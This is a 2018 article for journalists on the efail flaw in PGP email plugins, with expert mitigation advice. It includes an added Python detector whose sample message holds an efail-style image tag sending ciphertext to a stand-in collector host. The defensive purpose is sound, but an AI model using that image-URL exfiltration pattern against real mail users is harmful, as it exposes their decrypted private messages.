Bad news about Pretty Good Privacy

May 28, 2018

Groans resound in media safety workshops when the lesson on the encryption software, called Pretty Good Privacy, begins. Journalists without tech savvy find the program devilish to master. Eyes glaze as they grapple with the complex keys that scramble and unscramble secret messages.

This is the software that has reigned supreme among whistleblowers and investigative reporters for 30 years, allowing them to communicate privately, without being surveilled. Its popularity exploded after Edward Snowden used a similar method to share his NSA revelations with journalists in 2013.

Even for tech wizards, using the tool can be confusing. Now, it’s gotten more so.

Researchers from Europe recently tricked the most common way to use the system, thereby detecting a flaw in how leading email providers implement PGP. The researchers devised an attack named “efail” that forced Thunderbird, Apple Mail, and others to send them the plain text of encrypted messages. This means journalists should find a safer alternative to PGP email program plugins until a solution emerges.

There are steps you can take to mitigate the risks until the flaw is fixed.

The Electronic Frontier Foundation suggests the most radical approach: disable PGP on email for now. Switch to another type of secure end-to-end messaging, such as Signal.

“We’re not saying stop using PGP forever,” says Eva Galperin, director of security at the organization. “We’re suggesting they hold off while the security industry looks at whether these vulnerabilities have other implications.” Other experts recommend disabling HTML and remote content in email programs, through which the bug can be transmitted.

Put simply, PGP involves keys that allow two parties to jumble text to look something like 6FG/wgryQ1AQ//X7RZgF+r1Uwwpf, and then unscramble it back. If the ploy works properly, no one else can decipher the message.

With efail, an attacker can send an email with an HTML image element that includes a block of ciphertext as part of the image’s URL. Even if the recipient doesn’t read the email or click on it, the email program would automatically decrypt the ciphertext, changing the URL to include the plaintext of the message, and then load that URL, sending the adversary a copy of the decrypted message. The image, in essence, serves as a window to spy through. Shutting off HTML will get rid of that risk, but it will also get rid of the pretty stuff you see on MailChimp and Paperless Post.
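The pattern described above can be checked for on the receiving side before a message is ever rendered. The following is an added example, not code from the article or from the efail researchers: a Python sketch that scans the HTML parts of a raw message for URLs a mail client would fetch automatically and flags any that carry a PGP armored block. The attribute list, the function names and the sample message (with placeholder ciphertext and example domains) are assumptions constructed for illustration.

```python
from email import message_from_string
from html.parser import HTMLParser

# Attributes a mail client fetches on display, with no click needed.
AUTOLOAD_ATTRS = {"src", "background", "poster"}
REMOTE_PREFIXES = ("http://", "https://", "//")
PGP_ARMOR = "-----BEGIN PGP MESSAGE-----"

class RemoteLoadFinder(HTMLParser):
    """Records (tag, attribute, carries_ciphertext) for auto-loaded remote URLs."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            url = (value or "").strip()
            if name in AUTOLOAD_ATTRS and url.lower().startswith(REMOTE_PREFIXES):
                self.findings.append((tag, name, PGP_ARMOR in url))

def scan_message(raw):
    """Scan every text/html part of a raw message for remote auto-loads."""
    findings = []
    for part in message_from_string(raw).walk():
        if part.get_content_type() != "text/html":
            continue
        charset = part.get_content_charset() or "utf-8"
        html = part.get_payload(decode=True).decode(charset, "replace")
        finder = RemoteLoadFinder()
        finder.feed(html)
        finder.close()
        findings.extend(finder.findings)
    return findings

# Constructed sample: one image URL carrying an armored block (placeholder
# ciphertext), one ordinary remote image, one inline cid: image.
SAMPLE = (
    "From: sender@example.org\n"
    "Content-Type: text/html; charset=utf-8\n"
    "\n"
    '<img src="http://collector.example/'
    '-----BEGIN PGP MESSAGE-----\nPLACEHOLDER\n-----END PGP MESSAGE-----">\n'
    '<img src="https://news.example/logo.png">\n'
    '<img src="cid:inline-logo">\n'
)

if __name__ == "__main__":
    for tag, attr, has_ct in scan_message(SAMPLE):
        print(tag, attr, "CIPHERTEXT IN URL" if has_ct else "remote content")
```

Any finding at all means the message would trigger a network request if remote content were enabled; a finding with ciphertext in the URL is the specific shape the article describes.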

That inconvenience should be weighed against the likelihood of surveillance. The threat is particularly worrisome for someone on the radar of, say, the NSA, which has piles of encrypted text stored in Utah.

Micah Lee, The Intercept’s guru on Internet privacy, is one such potential target. He served as the point of entry for Snowden leaks. In order to test efail, Lee sent an email to himself that exploited the vulnerability. Voilà, it worked. The efail decoded the encrypted message. (He goes into detail on Twitter.)

“This would be a cinch for most computer science grad students in the world,” he says. “The vulnerabilities are very big and serious.”

For hardcore users reliant on PGP, dumping the protocol would be “highly impracticable,” Lee adds. It’s too integral to how they work.

Therefore, journalists and their sources who understand the PGP shortcomings should simply exercise more caution. Everyone should stay abreast of updates to their email clients and use the latest versions as they come out. Thunderbird and its Enigmail plug-in have announced partial patches; fixes from others will likely follow.

The Tactical Tech Collective in Berlin advises making sure the people you engage with are updated as well, and evaluating whether you can move from PGP to Signal or other instant messaging. Messaging apps are more secure for now, but they have downsides. Signal doesn’t allow users to search for an attachment sent last January. Neither does it allow access to old messages on a new phone. And perhaps more importantly, it exposes telephone numbers, which presents different privacy implications.

Signal is not immune to bugs, either. Earlier this month, researchers discovered that attackers could inject malicious code into the Signal desktop app. Fortunately, developers quickly addressed it. (It’s easier to fix a single developer’s software than the messy world of email, where a ton of clients compete: Gmail, Apple versus Outlook, Blackberry, etc.)

“We don’t have a single piece of advice to give to people,” says Tactical’s Cade Diehm, who leads a project on user privacy. “The number one thing I would say is that when situations like this happen, it’s important not to get too alarmed right away. Vulnerabilities are scary but with them come patches.”

Harlo Holmes, director of newsroom digital security for the Freedom of the Press Foundation, feels all media should use end-to-end encryption, in whatever form most appropriate. It’s wise to get into the habit of hiding data. And a critical mass of users arouses less suspicion among hostile authorities than a few users trying to communicate secretly using the same obscure service.

But the takeaway is that you can never get too comfortable with any type of software, even if it’s proved reliable until now. Whatever you deploy, you have to stay on top of developments, and constantly compare the latest information.

“Things can change at the drop of a hat,” Holmes warns.

Judith Matloff teaches conflict reporting at Columbia's Graduate School of Journalism. She's the author of two books on conflict, Fragments of a Forgotten War and No Friends But the Mountains, as well as a manual for journalists covering dangerous stories, How to Drag a Body.